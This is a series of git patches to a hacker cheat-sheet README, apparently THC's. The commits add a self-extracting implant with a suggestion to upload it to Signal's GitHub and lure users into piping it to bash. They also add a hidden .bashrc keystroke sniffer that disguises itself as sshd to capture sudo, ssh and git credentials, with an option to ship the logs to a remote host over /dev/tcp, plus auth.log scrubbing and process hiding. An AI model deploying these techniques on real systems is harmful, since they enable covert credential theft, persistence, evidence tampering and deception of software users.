From 124abc268d3f91b1f65f653f730c9e098b5f051e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 19 Apr 2024 10:00:05 +0100 Subject: [PATCH 01/37] Update README.md --- README.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/README.md b/README.md index 487822e..ddfba80 100644 --- a/README.md +++ b/README.md @@ -75,6 +75,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Remote access an entire network](#backdoor-network) 1. [Smallest PHP backdoor](#carriage-return-backdoor) 1. [Local Root backdoor](#ld-backdoor) + 1. [Self-extracting implant](#implant) 1. [Host Recon](#hostrecon) 1. [Shell Hacks](#shell-hacks) 1. [Shred files (secure delete)](#shred) @@ -1605,6 +1606,33 @@ Become root /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")' ``` + +**6.vi. Self-Extracting implant** + +Create a self-extracting shell-script using [mkegg.sh](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/mkegg.sh) (see source for examples). + +Simple example: +```sh +# Create implant 'egg.sh' containing the file 'foo' +# and the directory 'warez'. When executing 'egg.sh' then +# extract 'foo' and 'warez' and call 'warez/run/sh' +./mkegg.sh egg.sh foo warez warez/run.sh +``` + +Real world examples are best: +1. Create an implant that installs gsocket and calls our webhook on success: +```sh +./mkegg.sh egg.sh deploy-all.sh '(GS_WEBHOOK_KEY=e90d4b38-8285-490d-b5ab-a6d5c7c990a7 deploy-all.sh 2>/dev/null >/dev/null &)' +# On the target system do: 'cat egg.sh | bash' or './egg.sh' +``` + +2. Rename `egg.sh` to `update-for-fools.txt` and upload as blob to [Signal's](https://www.signal.org/) GitHub repository. + +3. Don't fool people to update Signal using this command ❤️: +```sh +curl -fL https://github.com/signalapp/Signal-Desktop/files/15037868/update-for-fools.txt | bash +``` + ## 7. Host Recon --- From 1d774a5d0a73622f0e3ae8713e72fa690bf376f2 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 22 Apr 2024 20:42:34 +0100 Subject: [PATCH 02/37] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index ddfba80..07c19cd 100644 --- a/README.md +++ b/README.md @@ -2107,6 +2107,7 @@ System Information Gathering 1. `curl -fsSL https://thc.org/ws | bash` - Show all domains hosted on a server + system-information 1. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system informations for hackers. 1. https://github.com/zMarch/Orc - Post-exploit tool to find local RCE (type `getexploit` after install) +1. https://github.com/The-Z-Labs/linux-exploit-suggester - Suggest exploits based on versions on target system 1. https://github.com/efchatz/pandora - Windows: dump password from various password managers Backdoors From 9b0ad766ab247ff70897f489876aaa4820714ce3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 24 Apr 2024 07:47:08 +0100 Subject: [PATCH 03/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 07c19cd..26e0196 100644 --- a/README.md +++ b/README.md @@ -1687,7 +1687,7 @@ curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16 Using `grep`: ```sh # Find passwords (without garbage). -grep -HEronasir '.{16}password.{,64}' . +grep -HEronasi '.{16}password.{,64}' . # Find TLS or OpenSSH keys: grep -r -F -- " PRIVATE KEY-----" . ``` From 8e1120d6f585bd180e98d6d12097b62a5113cd50 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 24 Apr 2024 08:46:15 +0100 Subject: [PATCH 04/37] Update README.md --- README.md | 30 +++++++++++++++++++++--------- 1 file changed, 21 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 26e0196..aa238c2 100644 --- a/README.md +++ b/README.md @@ -1660,7 +1660,7 @@ find / -xdev -type f -perm /6000 -ls 2>/dev/null ``` Find all writeable directories: -```sh +```bash wfind() { local arr dir @@ -1676,11 +1676,11 @@ wfind() { # Usage: wfind /etc /var /usr ``` -Find local passwords (using noseyparker): +Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker): ```sh -curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16.0/noseyparker-v0.16.0-x86_64-unknown-linux-gnu.tar.gz | tar xvfz - --transform="flags=r;s|.*/||" --no-anchored --wildcards noseyparker && \ -./noseyparker scan . && \ -./noseyparker report +curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static +./np scan . && \ +./np report ``` (Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history) @@ -1692,6 +1692,20 @@ grep -HEronasi '.{16}password.{,64}' . grep -r -F -- " PRIVATE KEY-----" . ``` +Find Subdomains in files: +```bash +find_subdomains() { + local d="${1}" + local rexf='[0-9a-z.-]{0,64}'"${d}" + local rex="$rexf"'([^a-z0-9]{1}|$)' + [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain \.com | anew"; return; } + shift 1 + [ $# -le 0 ] && [ -t 0 ] && set -- . + command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eo "$rexf"; return; } + grep -Eaohr "$rex" "$@" | grep -Eo "$rexf" +} +``` + --- ## 8. Shell Hacks @@ -1734,10 +1748,8 @@ This will reset the logfile to 0 without having to restart syslogd etc: This will remove any line containing the IP `1.2.3.4` from the log file: ```sh -xlog() { - local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}" -} -xlog "1\.2\.3\.4" /var/log/auth.log +xlog() { local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}"; } +# xlog "1\.2\.3\.4" /var/log/auth.log # xlog "${SSH_CLIENT%% *}" /var/log/auth.log # xlog "^2023.* thc\.org" foo.log ``` From fe13d06bb4dde12bd6f0180ce7955df38975b0cc Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 25 Apr 2024 09:19:05 +0100 Subject: [PATCH 05/37] Update README.md --- README.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index aa238c2..476bc92 100644 --- a/README.md +++ b/README.md @@ -1692,18 +1692,20 @@ grep -HEronasi '.{16}password.{,64}' . grep -r -F -- " PRIVATE KEY-----" . ``` -Find Subdomains in files: +Find Subdomains or emails in files: ```bash find_subdomains() { local d="${1}" - local rexf='[0-9a-z.-]{0,64}'"${d}" - local rex="$rexf"'([^a-z0-9]{1}|$)' + local rexf='[0-9a-zA-Z_.-]{0,64}'"${d}" + local rex="$rexf"'([^0-9a-zA-Z_]{1}|$)' [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain \.com | anew"; return; } shift 1 [ $# -le 0 ] && [ -t 0 ] && set -- . command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eo "$rexf"; return; } grep -Eaohr "$rex" "$@" | grep -Eo "$rexf" } +# find_subdomain foobar.com +# find_subdomain @gmail.com ``` --- From 8cc9099237075e994412acff36c3b5d25d6e8a20 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 10:33:13 +0100 Subject: [PATCH 06/37] Update README.md --- README.md | 21 +++++++++++++++------ 1 file changed, 15 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 476bc92..bd8af4f 100644 --- a/README.md +++ b/README.md @@ -231,8 +231,7 @@ echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap -e GREP; }' >>~/.ba This requires root privileges and is an old Linux trick by over-mounting /proc/<pid> with a useless directory: ```sh -hide() -{ +hide() { [[ -L /etc/mtab ]] && { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; } _pid=${1:-$$} [[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid && echo "[THC] PID $_pid is now hidden"; return; } @@ -1889,13 +1888,23 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. **10.i Sniff a user's SHELL session with script** -A method to log the shell session of a user (who logged in via SSH). +A method to log the shell session of a user. Useful when you are not root but still like to capture the sudo/ssh credentials of the user. Records the user's keystrokes to `~/.config/.pty/.@*`. -The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in: +Cut & paste the following and follow the instructions: ```sh -echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile +{ mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ +&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x896_64}_Linux/Baseutils/script" \ +&& chmod 755 ~/.config/.pty/sshd@pty0 \ +&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ +&& chmod 755 ~/.config/.pty/clear \ +&& echo 'SUCCESS. Add this to the ~/.bashrc:' \ +&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e .config/.pty/clear ] && [ -e .config/.pty/sshd@pty0 ] && LC_PTY=1 exec .config/.pty/clear ".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ".config/.pty/.@pty-unix.$$"\e[0m]' ``` -Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. + +- Combined with zapper to hide command options from the process list. +- Requires util-linux >= 2.37 (-I flag). We pull the static bin from [ajam](https://bin.ajam.dev). +- Consider using /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. +- Log in with `ssh -o "SetEnv LC_PTY=1"` to disable logging. **10.ii Sniff all SHELL sessions with dtrace - FreeBSD** From b2e65a861e4be518f996926359c6ca92543ab1d2 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 10:40:50 +0100 Subject: [PATCH 07/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index bd8af4f..4837206 100644 --- a/README.md +++ b/README.md @@ -1893,7 +1893,7 @@ A method to log the shell session of a user. Useful when you are not root but st Cut & paste the following and follow the instructions: ```sh { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ -&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x896_64}_Linux/Baseutils/script" \ +&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \ && chmod 755 ~/.config/.pty/sshd@pty0 \ && curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ && chmod 755 ~/.config/.pty/clear \ From f89debe4f5a484fe49b434d207f5cde3d40bcccd Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 10:41:37 +0100 Subject: [PATCH 08/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4837206..8667778 100644 --- a/README.md +++ b/README.md @@ -1898,7 +1898,7 @@ Cut & paste the following and follow the instructions: && curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ && chmod 755 ~/.config/.pty/clear \ && echo 'SUCCESS. Add this to the ~/.bashrc:' \ -&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e .config/.pty/clear ] && [ -e .config/.pty/sshd@pty0 ] && LC_PTY=1 exec .config/.pty/clear ".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ".config/.pty/.@pty-unix.$$"\e[0m]' +&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e .config/.pty/clear ] && [ -e .config/.pty/sshd@pty0 ] && LC_PTY=1 exec .config/.pty/clear ".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ".config/.pty/.@pty-unix.$$"\e[0m' ``` - Combined with zapper to hide command options from the process list. From fe0dba1f9df35f8765d12b4e2b096dd88926dca6 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 12:00:08 +0100 Subject: [PATCH 09/37] Update README.md --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 8667778..eb582db 100644 --- a/README.md +++ b/README.md @@ -91,7 +91,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) 1. [SSH session sniffing and hijacking](#ssh-sniffing) - 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) + 1. [Sniff a user's SHELL session](#session-sniffing) 2. [Sniff all SHELL sessions with dtrace](#dtrace) 2. [Sniff all SHELL sessions with eBPF](#bpf) 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) @@ -1885,10 +1885,10 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. --- ## 10. SSH Sniffing - -**10.i Sniff a user's SHELL session with script** + +**10.i Sniff a user's SHELL session** -A method to log the shell session of a user. Useful when you are not root but still like to capture the sudo/ssh credentials of the user. Records the user's keystrokes to `~/.config/.pty/.@*`. +Records the user's keystrokes to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user. Cut & paste the following and follow the instructions: ```sh @@ -1902,7 +1902,7 @@ Cut & paste the following and follow the instructions: ``` - Combined with zapper to hide command options from the process list. -- Requires util-linux >= 2.37 (-I flag). We pull the static bin from [ajam](https://bin.ajam.dev). +- Requires `/usr/bin/script` from util-linux >= 2.37 (-I flag). We pull the static bin from [ajam](https://bin.ajam.dev). - Consider using /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. - Log in with `ssh -o "SetEnv LC_PTY=1"` to disable logging. From 3853a70a2b80c55ef707b4aa308037d663b2a57d Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 16:36:22 +0100 Subject: [PATCH 10/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index eb582db..79e57cc 100644 --- a/README.md +++ b/README.md @@ -1888,7 +1888,7 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. **10.i Sniff a user's SHELL session** -Records the user's keystrokes to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user. +A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user. Cut & paste the following and follow the instructions: ```sh From 9066a0dd381348f541f7b1e6243d6d582ca411a9 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 19:38:48 +0100 Subject: [PATCH 11/37] Update README.md --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 79e57cc..fd5f133 100644 --- a/README.md +++ b/README.md @@ -1892,13 +1892,14 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co Cut & paste the following and follow the instructions: ```sh -{ mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ +{ [ -f /bixn/bash ] || echo "Not found: /bin/bash"; } \ +&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ && curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \ && chmod 755 ~/.config/.pty/sshd@pty0 \ && curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ && chmod 755 ~/.config/.pty/clear \ && echo 'SUCCESS. Add this to the ~/.bashrc:' \ -&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e .config/.pty/clear ] && [ -e .config/.pty/sshd@pty0 ] && LC_PTY=1 exec .config/.pty/clear ".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ".config/.pty/.@pty-unix.$$"\e[0m' +&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ~/".config/.pty/.@pty-unix.$$"\e[0m' ``` - Combined with zapper to hide command options from the process list. From 8cad376db8010e7e4ae0dc08a4e06f04de6bc5b6 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 19:49:29 +0100 Subject: [PATCH 12/37] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fd5f133..d57c920 100644 --- a/README.md +++ b/README.md @@ -1892,14 +1892,14 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co Cut & paste the following and follow the instructions: ```sh -{ [ -f /bixn/bash ] || echo "Not found: /bin/bash"; } \ +[ -f /bin/bash ] || { echo "Not found: /bin/bash"; false; } \ && { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ && curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \ && chmod 755 ~/.config/.pty/sshd@pty0 \ && curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ && chmod 755 ~/.config/.pty/clear \ && echo 'SUCCESS. Add this to the ~/.bashrc:' \ -&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ~/".config/.pty/.@pty-unix.$$"\e[0m' +&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash /bin/bash" -I ~/".config/.pty/.@pty-unix.$$"\e[0m' ``` - Combined with zapper to hide command options from the process list. From f7b41e22cc763889b005f6c2243396dd04654be4 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 20:24:16 +0100 Subject: [PATCH 13/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d57c920..1b6cb25 100644 --- a/README.md +++ b/README.md @@ -1899,7 +1899,7 @@ Cut & paste the following and follow the instructions: && curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ && chmod 755 ~/.config/.pty/clear \ && echo 'SUCCESS. Add this to the ~/.bashrc:' \ -&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash /bin/bash" -I ~/".config/.pty/.@pty-unix.$$"\e[0m' +&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash /bin/bash" -I ~/.config/.pty/.@pty-unix.$$\e[0m' ``` - Combined with zapper to hide command options from the process list. From b8ba48734a4b10b37f9bf4dedb7ce0ab5327bace Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 20:28:25 +0100 Subject: [PATCH 14/37] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1b6cb25..7e0bde4 100644 --- a/README.md +++ b/README.md @@ -1892,14 +1892,14 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co Cut & paste the following and follow the instructions: ```sh -[ -f /bin/bash ] || { echo "Not found: /bin/bash"; false; } \ +command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ && { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ && curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \ && chmod 755 ~/.config/.pty/sshd@pty0 \ && curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ && chmod 755 ~/.config/.pty/clear \ && echo 'SUCCESS. Add this to the ~/.bashrc:' \ -&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash /bin/bash" -I ~/.config/.pty/.@pty-unix.$$\e[0m' +&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' ``` - Combined with zapper to hide command options from the process list. From b514269873a665335044626752d7ea4794a1d46b Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Apr 2024 22:48:35 +0100 Subject: [PATCH 15/37] Update README.md --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 7e0bde4..3ab1e32 100644 --- a/README.md +++ b/README.md @@ -1894,12 +1894,12 @@ Cut & paste the following and follow the instructions: ```sh command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ && { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ -&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \ -&& chmod 755 ~/.config/.pty/sshd@pty0 \ -&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ -&& chmod 755 ~/.config/.pty/clear \ +&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \ +&& chmod 755 ~/.config/.pty/pty \ +&& curl -o ~/.config/.pty/ini -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ +&& chmod 755 ~/.config/.pty/ini \ && echo 'SUCCESS. Add this to the ~/.bashrc:' \ -&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' +&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' ``` - Combined with zapper to hide command options from the process list. From 48333ea29238c627f7aa65be1a00b34cc67983ac Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 28 Apr 2024 08:40:50 +0100 Subject: [PATCH 16/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 3ab1e32..aa753dc 100644 --- a/README.md +++ b/README.md @@ -1890,7 +1890,7 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user. -Cut & paste the following and follow the instructions: +Deploy: Cut & paste the following onto the target and follow the instructions: ```sh command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ && { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ From 23bdb7e2236f7bdd50af65d84ae02bb8108b9618 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 28 Apr 2024 10:34:16 +0100 Subject: [PATCH 17/37] Update README.md --- README.md | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index aa753dc..e326505 100644 --- a/README.md +++ b/README.md @@ -1893,13 +1893,12 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co Deploy: Cut & paste the following onto the target and follow the instructions: ```sh command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ -&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \ -&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \ -&& chmod 755 ~/.config/.pty/pty \ -&& curl -o ~/.config/.pty/ini -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \ -&& chmod 755 ~/.config/.pty/ini \ -&& echo 'SUCCESS. Add this to the ~/.bashrc:' \ -&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' +&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \ +&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \ +&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \ +&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \ +&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \ +&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' ``` - Combined with zapper to hide command options from the process list. From 0504218fd5d0ee726f42aad054265d3e7eaec253 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 30 Apr 2024 17:11:19 +0100 Subject: [PATCH 18/37] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index e326505..b928df7 100644 --- a/README.md +++ b/README.md @@ -2152,8 +2152,9 @@ DDoS 1. [DeepNet](https://github.com/the-deepnet/ddos) - we despise DDoS but if we had to then this would be our choice. Static Binaries / pre-compiled Tools -1. https://github.com/Azathothas/Toolpacks/tree/main from [hysp project](https://github.com/metis-os/hysp-pkgs) +1. https://bin/ajam.dev 